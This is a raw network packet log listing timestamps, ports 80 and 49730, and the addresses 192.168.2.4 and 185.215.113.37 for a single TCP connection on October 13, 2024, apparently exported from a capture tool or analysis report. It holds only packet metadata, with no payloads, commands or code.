Oct 13, 2024 17:46:16.905169010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905169964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905189037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905200958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905210018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905210972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905224085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905234098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905245066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905249119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905272961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905284882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905288935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905297995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905308962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905319929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905322075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905354023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905368090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905380011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905385017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905390978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905420065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905452967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905482054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905493021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905503988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905514956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905525923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905534983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905540943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905546904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905576944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905600071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905602932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905632973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905642033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905644894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905668020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905694962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905697107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905709028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905719995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905730009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905734062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905766010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905787945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905823946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905834913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905853033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905857086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905864000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905879974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905900002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905951977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.961940050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.961958885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.961971045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.961982012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962002993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962013006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962024927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962069988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962080002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962091923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962101936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962112904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962132931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962143898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962155104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962157965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962224960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962235928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962235928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962248087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962281942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962300062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962317944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962328911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962336063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962341070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962352037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962390900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962408066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962526083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962536097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962547064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962574959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962589979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962666035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962677002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962690115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962713003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962737083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962891102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962944984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.962948084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962964058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.962991953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963012934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963025093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963036060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963044882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963047981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963063002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963064909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963073969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963085890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963092089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963099003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963115931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963125944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963162899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963169098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963179111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963188887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963201046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963212013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963232994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963249922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963321924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963339090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963349104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963365078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963366985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963391066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963398933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963407040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963419914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963429928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963440895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963445902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963452101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963457108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963459015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963466883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963479042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963494062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963515043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963525057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963525057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963555098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963581085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963661909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963673115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963680983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963691950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963697910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963707924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963717937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963721991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963753939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963763952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963794947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963805914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963815928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963825941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.963843107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.963871002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995306015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995327950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995341063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995351076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995362997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995389938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995423079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995434999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995445013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995448112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995465040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995477915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995480061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995488882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995500088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995503902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995518923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995529890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995537043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995548010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995558977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995558977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995573044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995583057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995585918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995598078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995609045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995615005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995625973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995632887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995651960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995680094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995690107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995701075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995701075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995719910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995806932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995819092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995831013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995836020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995841980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995846033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995853901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995865107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995882988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995892048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995903015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995912075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995917082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995929003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995963097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.995984077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.995995998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996006966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996016979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996026993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996028900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.996049881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.996078014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.996134043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996181011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.996211052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996222019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996232986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996247053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996257067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996257067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.996267080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.996304035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.996318102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.052670956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052697897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052709103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052721024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052740097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052751064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052776098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.052881002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.052881956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052896976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052910089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052920103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052933931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052937031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.052944899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052957058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052967072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052978039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.052984953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.052984953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.052988052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053005934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053016901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053029060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053040028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053046942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053046942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053056002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053069115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053086996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053087950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053252935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053373098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053422928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053433895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053443909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053455114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053462982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053462982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053467989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053478956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053488970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053512096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053512096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053528070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053539991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053569078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053569078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053601980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053621054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053632975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053639889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053639889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053643942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053657055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053663015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053668976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053685904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053694963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053705931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053705931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053745031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053745031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053796053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053807974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053821087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053839922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053867102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053878069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053889990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053901911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053903103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053903103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053914070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053960085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053960085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.053986073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.053997993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054008961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054029942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054065943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054076910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054088116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054099083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054105997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054105997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054111004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054148912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054148912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054171085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054208994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054220915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054233074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054315090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054325104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054337025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054347992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054366112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054378033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054384947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054384947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054389000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054402113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054411888 CEST	80	49730	185.215.113.37	192.168.2.4
